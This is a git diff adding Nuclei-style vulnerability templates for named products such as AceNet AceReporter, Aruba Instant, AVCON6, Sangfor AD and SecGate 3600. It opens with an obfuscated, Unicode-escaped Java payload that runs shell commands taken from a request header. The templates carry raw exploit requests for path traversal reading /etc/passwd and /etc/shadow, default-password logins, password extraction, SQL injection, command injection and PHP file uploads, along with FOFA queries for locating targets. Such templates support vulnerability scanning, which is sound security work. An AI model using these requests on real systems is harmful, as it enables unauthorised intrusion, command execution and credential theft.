9\u0066\u0020\u0028\u0074\u0020\u003d\u003d\u0020\u006e\u0075\u006c\u006c\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u0074\u0072\u0020\u003d\u0020\u0074\u002e\u0067\u0065\u0074\u004e\u0061\u006d\u0065\u0028\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0065\u0078\u0065\u0063\u0022\u0029\u0020\u007c\u007c\u0020\u0021\u0073\u0074\u0072\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0068\u0074\u0074\u0070\u0022\u0029\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u0020\u003d\u0020\u0074\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0061\u0072\u0067\u0065\u0074\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0074\u0029\u003b\u0069\u0066\u0020\u0028\u0021\u0028\u006f\u0062\u006a\u0020\u0069\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u006f\u0066\u0020\u0052\u0075\u006e\u006e\u0061\u0062\u006c\u0065\u0029\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0069\u0073\u0024\u0030\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u0064\u006c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u0046\u0069\u0065\u006c\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u0064\u006c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0067\u006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u0046\u0069\u0065\u006c\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0067\u006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u004c\u0069\u0073\u0074\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u0020\u003d\u0020\u0028\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u004c\u0069\u0073\u0074\u0029\u0020\u0028\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u0029\u003b\u0066\u006f\u0072\u0020\u0028\u0069\u006e\u0074\u0020\u006a\u0020\u003d\u0020\u0030\u003b\u0020\u006a\u0020\u003c\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u002e\u0073\u0069\u007a\u0065\u0028\u0029\u003b\u0020\u002b\u002b\u006a\u0029\u0020\u007b\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u002e\u0067\u0065\u0074\u0028\u006a\u0029\u003b\u0066\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0072\u0065\u0071\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0071\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0073\u0070\u0020\u003d\u0020\u0072\u0065\u0071\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u0052\u0065\u0073\u0070\u006f\u006e\u0073\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u0030\u005d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u0030\u005d\u0029\u003b\u0073\u0074\u0072\u0020\u003d\u0020\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u0029\u0020\u0072\u0065\u0071\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u0048\u0065\u0061\u0064\u0065\u0072\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0022\u0043\u006d\u0064\u0022\u007d\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u0020\u0021\u003d\u0020\u006e\u0075\u006c\u006c\u0020\u0026\u0026\u0020\u0021\u0073\u0074\u0072\u002e\u0069\u0073\u0045\u006d\u0070\u0074\u0079\u0028\u0029\u0029\u0020\u007b\u0020\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0073\u0065\u0074\u0053\u0074\u0061\u0074\u0075\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0032\u0030\u0030\u0029\u007d\u0029\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u0020\u0063\u006d\u0064\u0073\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u0063\u006d\u0064\u002e\u0065\u0078\u0065\u0022\u002c\u0020\u0022\u002f\u0063\u0022\u002c\u0020\u0073\u0074\u0072\u007d\u0020\u003a\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u002f\u0062\u0069\u006e\u002f\u0073\u0068\u0022\u002c\u0020\u0022\u002d\u0063\u0022\u002c\u0020\u0073\u0074\u0072\u007d\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u0022\u0047\u0042\u004b\u0022\u003a\u0022\u0055\u0054\u0046\u002d\u0038\u0022\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0074\u0065\u0078\u0074\u0032\u0020\u003d\u0028\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0053\u0063\u0061\u006e\u006e\u0065\u0072\u0028\u0028\u006e\u0065\u0077\u0020\u0050\u0072\u006f\u0063\u0065\u0073\u0073\u0042\u0075\u0069\u006c\u0064\u0065\u0072\u0028\u0063\u006d\u0064\u0073\u0029\u0029\u002e\u0073\u0074\u0061\u0072\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u0029\u002c\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u0029\u002e\u0075\u0073\u0065\u0044\u0065\u006c\u0069\u006d\u0069\u0074\u0065\u0072\u0028\u0022\u005c\u005c\u0041\u0022\u0029\u002e\u006e\u0065\u0078\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0072\u0065\u0073\u0075\u006c\u0074\u003d\u0028\u0022\u0045\u0078\u0065\u0063\u0075\u0074\u0065\u003a\u0020\u0020\u0020\u0020\u0022\u002b\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0074\u0065\u0078\u0074\u0032\u002c\u0022\u0075\u0074\u0066\u002d\u0038\u0022\u0029\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u0020\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0022\u006f\u0072\u0067\u002e\u0061\u0070\u0061\u0063\u0068\u0065\u002e\u0074\u006f\u006d\u0063\u0061\u0074\u002e\u0075\u0074\u0069\u006c\u002e\u0062\u0075\u0066\u002e\u0042\u0079\u0074\u0065\u0043\u0068\u0075\u006e\u006b\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0063\u006c\u0073\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u003b\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0073\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u006f\u0062\u006a\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u0073\u0075\u006c\u0074\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0030\u0029\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0072\u0065\u0073\u0075\u006c\u0074\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u0029\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006f\u0062\u006a\u007d\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u004d\u0065\u0074\u0068\u006f\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0076\u0061\u0072\u0035\u0029\u0020\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u0020\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0022\u006a\u0061\u0076\u0061\u002e\u006e\u0069\u006f\u002e\u0042\u0079\u0074\u0065\u0042\u0075\u0066\u0066\u0065\u0072\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0077\u0072\u0061\u0070\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0063\u006c\u0073\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u0073\u0075\u006c\u0074\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006f\u0062\u006a\u007d\u0029\u003b\u0020\u007d\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0074\u0072\u0075\u0065\u003b\u0020\u007d\u0069\u0066\u0020\u0028\u0066\u006c\u0061\u0067\u0029\u0020\u007b\u0020\u0062\u0072\u0065\u0061\u006b\u003b\u0020\u007d\u0020\u007d\u0069\u0066\u0020\u0028\u0066\u006c\u0061\u0067\u0029\u0020\u007b\u0020\u0062\u0072\u0065\u0061\u006b\u003b\u0020\u007d\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0020\u007d + + + matchers-condition: and + matchers: + - type: word + words: + - "Execute:" + - type: word + words: + - "{{randstr}}" + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/other/acenet-acereporter-report-component-arbitrary-file-download.yaml b/http/vulnerabilities/other/acenet-acereporter-report-component-arbitrary-file-download.yaml new file mode 100755 index 0000000000..391b41b8b2 --- /dev/null +++ b/http/vulnerabilities/other/acenet-acereporter-report-component-arbitrary-file-download.yaml @@ -0,0 +1,32 @@ +id: acenet-acereporter-report-component-arbitrary-file-download + +info: + name: AceNet AceReporter Report component Arbitrary file download + author: SleepingBag945 + severity: medium + description: | + The vulnerability of arbitrary file download or read is mainly caused by the fact that when the application system provides the function of file download or read, the application system directly specifies the file path in the file path parameter without verifying the validity of the file path. As a result, the attacker can jump through the directory to download or read a file beyond the original specified path. + The attacker can finally download or read any files on the system through this vulnerability, such as database files, application system source code, password configuration information and other important sensitive information, resulting in sensitive information leakage of the system. + metadata: + fofa-query: title="Login @ Reporter" || title="Technology, Inc." + tags: file download + +http: + - raw: + - | + GET /view/action/download_file.php?filename=../../../../../../../../../etc/passwd&savename=data.txt HTTP/1.1 + Host: {{Hostname}} + + + - | + GET /view/action/download_file.php?filename=../../../../../../../../../etc/hosts&savename=data.txt HTTP/1.1 + Host: {{Hostname}} + + + + matchers: + - type: dsl + dsl: + - 'contains(body_1,"root") && contains(body_1,"daemon")' + - 'status_code_2 == 200 && contains(body_2,"127.0.0.1")' + condition: and diff --git a/http/vulnerabilities/other/aic-intelligent-campus-system-password-leak.yaml b/http/vulnerabilities/other/aic-intelligent-campus-system-password-leak.yaml new file mode 100755 index 0000000000..89eae9d35b --- /dev/null +++ b/http/vulnerabilities/other/aic-intelligent-campus-system-password-leak.yaml @@ -0,0 +1,39 @@ +id: aic-intelligent-campus-system-password-leak + +info: + name: AIC Intelligent Campus System Password Leak + author: SleepingBag945 + severity: medium + description: | + Due to the design logic defects, the super password is leaked, which can kill more than 40 campus systems.
+ metadata: + fofa-query: title="AIC智能校园系统" + tags: Disclosure of Sensitive Information + +http: + - raw: + - | + GET /datacenter/dataOrigin.ashx?c=login HTTP/1.1 + Host: {{Hostname}} + + + + matchers: + - type: dsl + dsl: + - 'status_code == 200 && contains(body_1,"卡号") && contains(body_1,"密码")' + condition: and + + extractors: + - type: regex # type of the extractor + name: username + part: body # part of the response (header,body,all) + group: 1 + regex: + - "\"卡号\":\"(.*?)\"" # regex to use for extraction. + - type: regex # type of the extractor + name: passwd + part: body # part of the response (header,body,all) + group: 1 + regex: + - "\"密码\":\"(.*?)\"" # regex to use for extraction. \ No newline at end of file diff --git a/http/vulnerabilities/other/aruba-instant-default-login.yaml b/http/vulnerabilities/other/aruba-instant-default-login.yaml new file mode 100755 index 0000000000..0f317319bf --- /dev/null +++ b/http/vulnerabilities/other/aruba-instant-default-login.yaml @@ -0,0 +1,27 @@ +id: aruba-instant-default-login + +info: + name: Aruba Instant password vulnerability + author: SleepingBag945 + severity: medium + description: | + Aruba Instant is an AP device. The device has a default password, and attackers can control the entire platform through the default password admin/admin vulnerability, and use administrator privileges to operate core functions.
+ metadata: + fofa-query: body="jscripts/third_party/raphael-treemap.min.js" || body="jscripts/third_party/highcharts.src.js" + tags: default Password + +http: + - raw: + - | + POST /swarm.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + opcode=login&user=admin&passwd=admin&refresh=false&nocache=0.17699820340903838 + + + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200 && contains(body_1,"sid") && contains(body_1,"Admin")' + condition: and diff --git a/http/vulnerabilities/other/avcon6-org-execl-download-arbitrary-file-download.yaml b/http/vulnerabilities/other/avcon6-org-execl-download-arbitrary-file-download.yaml new file mode 100755 index 0000000000..0f296f70fd --- /dev/null +++ b/http/vulnerabilities/other/avcon6-org-execl-download-arbitrary-file-download.yaml @@ -0,0 +1,25 @@ +id: avcon6-org-execl-download-arbitrary-file-download + +info: + name: AVCON6 org_execl_download.action file down + author: SleepingBag945 + severity: medium + description: | + 华平软件视频会议 AVCON6 存在任意文件下载 + metadata: + fofa-query: title="AVCON6" + tags: fileread + +http: + - raw: + - | + GET /org_execl_download.action?filename=../../../../../../../../../../../../../etc/shadow HTTP/1.1 + Host: {{Hostname}} + + + + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200 && contains(body_1,"root:*:0")' + condition: and diff --git a/http/vulnerabilities/other/ciphertrust-default-password-vulnerability.yaml b/http/vulnerabilities/other/ciphertrust-default-password-vulnerability.yaml new file mode 100755 index 0000000000..dc945fce2f --- /dev/null +++ b/http/vulnerabilities/other/ciphertrust-default-password-vulnerability.yaml @@ -0,0 +1,27 @@ +id: ciphertrust-default-password-vulnerability + +info: + name: Ciphertrust default password vulnerability + author: SleepingBag945 + severity: medium + description: | + Attackers can control the entire platform through the default password (initpass) vulnerability, and use administrator privileges to operate core functions.
+ metadata: + fofa-query: cert="Ciphertrust" || fid="yHV5+ZZGMu0=" + tags: default Password + +http: + - raw: + - | + POST /api/v1/auth/tokens/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"username":"admin","connection":"local_account","password":"admin","grant_type":"password","refresh_token_revoke_unused_in":30,"cookies":true,"labels":["web-ui"]} + + + matchers: + - type: dsl + dsl: + - 'status_code_1 == 401 && contains(body_1,"code") && contains(body_1,"Password change required")' + condition: and diff --git a/http/vulnerabilities/other/cloud-oa-system-sqli.yaml b/http/vulnerabilities/other/cloud-oa-system-sqli.yaml new file mode 100644 index 0000000000..2fec8a765a --- /dev/null +++ b/http/vulnerabilities/other/cloud-oa-system-sqli.yaml @@ -0,0 +1,42 @@ +id: cloud-oa-system-sqli + +info: + name: Cloud OA system SQLi + author: SleepingBag945 + severity: high + description: cloud OA system /OA/PM/svc.asmx page parameters are not properly filtered, resulting in a SQL injection vulnerability, which can be used to obtain sensitive information in the database. + tags: cloudoa,sqli + +http: + - raw: + - | + POST /OA/PM/svc.asmx HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Type: text/xml + Accept-Encoding: gzip, deflate + + + + + + LOWER(CONVERT(VARCHAR(32),HashBytes('MD5','{{randstr}}'),2)) + + + + + + + matchers-condition: and + matchers: + - type: word + words: + - "System.Data.SqlClient.SqlException" + - " + + - | + GET /ddi/server/upload/{{randstr_2}}.php HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - status_code_1 == 200 + - status_code_2 == 200 && contains(body_2,"{{randstr_1}}") + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/sangfor/sangfor-ad-rce.yaml b/http/vulnerabilities/sangfor/sangfor-ad-rce.yaml new file mode 100644 index 0000000000..16a8d6ac5a --- /dev/null +++ b/http/vulnerabilities/sangfor/sangfor-ad-rce.yaml @@ -0,0 +1,29 @@ +id: sangfor-ad-rce + +info: + name: 深信服应用交付管理统远程命令执行 + author: SleepingBag945 + severity: critical + description: 深信服应用交付管理系统远程命令执行 + tags: sangfor,ad,rce + +http: + - raw: + - | + POST /rep/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + clsMode=cls_mode_login%0Aid%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123 + + + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - status_code_1 == 200 + - contains(body_1,'uid=') + condition: and + + diff --git a/http/vulnerabilities/secworld/secworld-secgate-3600-firewall-upload.yaml b/http/vulnerabilities/secworld/secworld-secgate-3600-firewall-upload.yaml new file mode 100644 index 0000000000..46f2772b9e --- /dev/null +++ b/http/vulnerabilities/secworld/secworld-secgate-3600-firewall-upload.yaml @@ -0,0 +1,56 @@ +id: secworld-secgate-3600-firewall-upload + +info: + name: secworld-secgate-3600-firewall-upload + author: SleepingBag945 + severity: critical + description: 网神防火墙obj_app_upfile任意文件上传 + reference: + - https://peiqi.wgpsec.org/wiki/iot/%E5%A5%87%E5%AE%89%E4%BF%A1/%E7%BD%91%E7%A5%9E%20SecGate%203600%20%E9%98%B2%E7%81%AB%E5%A2%99%20obj_app_upfile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html + tags: secworld + +http: + - raw: + - | + POST /?g=obj_app_upfile HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Accept-Encoding: gzip, deflate + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr_3}} + User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0) + + ------WebKitFormBoundary{{randstr_3}} + Content-Disposition: form-data; name="MAX_FILE_SIZE" + + 10000000 + ------WebKitFormBoundary{{randstr_3}} + Content-Disposition: form-data; name="upfile"; filename="{{randstr_1}}.php" + Content-Type: text/plain + + + + ------WebKitFormBoundary{{randstr_3}} + Content-Disposition: form-data; name="submit_post" + + obj_app_upfile + ------WebKitFormBoundary{{randstr_3}} + Content-Disposition: form-data; name="__hash__" + + 